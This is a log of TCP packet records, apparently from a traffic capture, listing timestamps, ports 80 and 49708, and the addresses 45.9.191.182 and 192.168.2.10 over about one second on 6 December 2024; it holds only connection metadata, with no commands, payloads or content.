Dec 6, 2024 11:05:31.853988886 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.854108095 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.854157925 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.855112076 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.855258942 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.855304956 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.856142998 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.856229067 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.856273890 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.857317924 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.857337952 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.858760118 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.858818054 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.858840942 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.859406948 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.859462023 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.859559059 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.859607935 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.860500097 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.860627890 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.860671997 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.861615896 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.861665964 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.861712933 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.862677097 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.862795115 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.863550901 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.863775969 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.863847971 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.863892078 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.864856958 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.864976883 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.866014004 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.866070032 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.866137981 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.867021084 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.867077112 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.867091894 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.867142916 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.868098974 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.868153095 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.868207932 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.869205952 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.869299889 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.869348049 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.870269060 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.870371103 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.870417118 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.871376038 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.871537924 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.871594906 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.872463942 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.872566938 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.872610092 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.873527050 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.873630047 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.873681068 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.874594927 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.874716043 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.874758959 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.875693083 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.875844955 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.875890970 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.876804113 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.876920938 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.876966000 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.877981901 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.877994061 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.878030062 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.878979921 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.879075050 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.879189968 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.880244970 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.880328894 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.880389929 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.881159067 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.881316900 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.881386042 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.882231951 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.882333994 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.882407904 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.883373022 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.883449078 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.883524895 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.884403944 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.884601116 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.885503054 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.885555983 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.885564089 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.885628939 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.886555910 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.886662006 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.886704922 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.887655020 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.887736082 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.887773037 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.888752937 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.888885975 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.888926029 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.889837027 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.889916897 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.889969110 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.890943050 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.891056061 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.891103983 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.892031908 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.892163992 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.892215967 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.893105984 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.893271923 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.893317938 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.894220114 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.894365072 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.894411087 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.895277023 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.895412922 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.895458937 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.896363974 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.896496058 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.896543026 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.897429943 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.897562027 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.897607088 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.898519039 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.898667097 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.898715019 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.899655104 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.899854898 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.899928093 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.900732994 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.900892973 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.900949001 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.901822090 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.902060032 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.902116060 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.902899027 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.903039932 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.903086901 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.904004097 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.904234886 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.904283047 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.905041933 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.905292034 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.905343056 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.906162024 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.906291008 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.906337976 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.907253981 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.907309055 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.907352924 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.908269882 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.958189011 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.043884039 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.044117928 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.044192076 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.044261932 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.044414997 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.044543028 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.045473099 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.045794964 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.045841932 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.045959949 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.046003103 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.046044111 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.047008038 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.047143936 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.047188997 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.048083067 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.048187017 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.048232079 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.049197912 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.049314976 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.049385071 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.050251007 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.050363064 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.050405025 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.051333904 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.051490068 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.051532984 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.052438021 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.052567005 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.052668095 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.053576946 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.053625107 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.053694010 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.054636002 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.054799080 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.054850101 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.055759907 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.055917025 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.055962086 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.056994915 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.057065010 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.057113886 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.057873964 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.058151960 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.058198929 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.058984041 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.059161901 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.059207916 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.060041904 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.060179949 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.060224056 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.061136961 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.061269999 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.061312914 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.062262058 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.062446117 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.062495947 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.063319921 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.063436031 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.063482046 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.064387083 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.064505100 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.064548016 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.065488100 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.065530062 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.065577030 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.066601992 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.066692114 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.066737890 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.067668915 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.067825079 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.067871094 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.068769932 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.068873882 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.068913937 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.069849968 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.069955111 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.070005894 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.073585033 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.073610067 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.073653936 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.073666096 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.073678017 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.073689938 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.073714972 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.073863983 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.073908091 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.074872971 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.075027943 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.075069904 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.076030970 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.076042891 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.076078892 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.076950073 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.077106953 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.077156067 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.078151941 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.078305006 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.078349113 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.079471111 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.079483986 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.079529047 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.080177069 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.080192089 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.080230951 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.080712080 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.081285000 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.081332922 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.083666086 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.083678961 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.083712101 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.084100008 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.084111929 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.084146023 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.084692001 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.084705114 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.084763050 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.085788965 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.085949898 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.085993052 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.086911917 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.086925030 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.086966038 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.087851048 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.088013887 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.088056087 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.088946104 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.089099884 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.089143991 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.090023041 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.090184927 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.090229034 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.091139078 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.091303110 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.091353893 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.092396975 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.092408895 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.092452049 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.093358994 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.093523979 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.093566895 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.094471931 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.094482899 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.094525099 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.095464945 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.095477104 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.095514059 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.096425056 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.096573114 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.096612930 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.097636938 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.097806931 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.097848892 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.098812103 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.098824978 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.098860979 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.100266933 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.100282907 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.100322962 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.100855112 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.145654917 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.236767054 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.236787081 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.236887932 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.236932993 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.237111092 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.237159967 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.237807989 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.237864971 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.237909079 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.238667011 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.238717079 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.238761902 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.239340067 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.239420891 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.239464045 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.240386009 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.240518093 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.240562916 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.241475105 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.241559982 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.241605997 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.242569923 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.242688894 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.242732048 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.243628979 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.243745089 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.243786097 CET	49708	80	192.168.2.10	45.9.191.182
